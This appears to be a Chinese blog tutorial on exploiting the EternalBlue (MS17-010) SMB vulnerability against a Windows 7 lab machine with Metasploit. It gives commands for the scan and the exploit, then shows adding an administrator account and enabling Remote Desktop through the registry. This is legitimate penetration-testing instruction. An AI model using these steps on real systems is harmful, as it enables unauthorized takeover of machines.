利用"永恒之蓝"漏洞 实现Windows Getshell 对靶机Win7进行控制

------------恢复内容开始------------

① 登录kali 提升root权限

sudo su //提权root
kali //输入密码
cd ~ //切换根目录

利用"永恒之蓝"漏洞 实现Windows Getshell 对靶机Win7进行控制

 ② 登录Kali Linux,进入MSF框架,搜索ms17-010代码

msfconsole  
msf > search ms17_010 

利用"永恒之蓝"漏洞 实现Windows Getshell 对靶机Win7进行控制

 

 利用"永恒之蓝"漏洞 实现Windows Getshell 对靶机Win7进行控制

 

 ③ 使用ms17-010扫描模块,对靶机Win7进行扫描

msf > use 1  //使用auxiliary/scanner/smb/smb_ms17_010扫描模块  
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.127.131 //设置目标IP或网段  
msf auxiliary(smb_ms17_010) > run //执行扫描  

 利用"永恒之蓝"漏洞 实现Windows Getshell 对靶机Win7进行控制

 

 从截图可以看到,扫描模块发现Win7存在漏洞风险

④ 使用ms17-010渗透模块,对靶机Win7进行渗透

msf > use 2 //使用exploit/windows/smb/ms17_010_eternalblue渗透模块 
msf exploit(ms17_010_eternalblue) > show options //查看可设置的选项  
msf exploit(ms17_010_eternalblue) > set RHOST 192.168.127.131 //设置渗透目标ip  
msf exploit(ms17_010_eternalblue) > exploit //执行渗透 

利用"永恒之蓝"漏洞 实现Windows Getshell 对靶机Win7进行控制

 

 利用"永恒之蓝"漏洞 实现Windows Getshell 对靶机Win7进行控制

 

 利用"永恒之蓝"漏洞 实现Windows Getshell 对靶机Win7进行控制

 

 从最终效果来看,此时Kali Linux通过MS17-010渗透代码,直接拿到Win7的Shell,之后便可以通过Shell对目标靶机WIN7进行控制。

⑤ 通过Shell对靶机Win7进行控制

net user xxxx xxxx /add //创建用户名密码xxxx/xxxx
net localgroup administrators xxxx /add //将用户xxxx添加入管理组
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f   //开启远程桌面功能 
rdesktop 192.168.127.131:3389 //Kali远程桌面连接Win7

利用"永恒之蓝"漏洞 实现Windows Getshell 对靶机Win7进行控制

 

 利用"永恒之蓝"漏洞 实现Windows Getshell 对靶机Win7进行控制

 

 

可以看到,最终Kali通过shell新建了用户,并通过远程桌面连接到目标靶机上.

 
上一篇:[老树新花]从未授权到GetShell


下一篇:Dedecms V5.7 sp2后台getshell漏洞复现(第一处)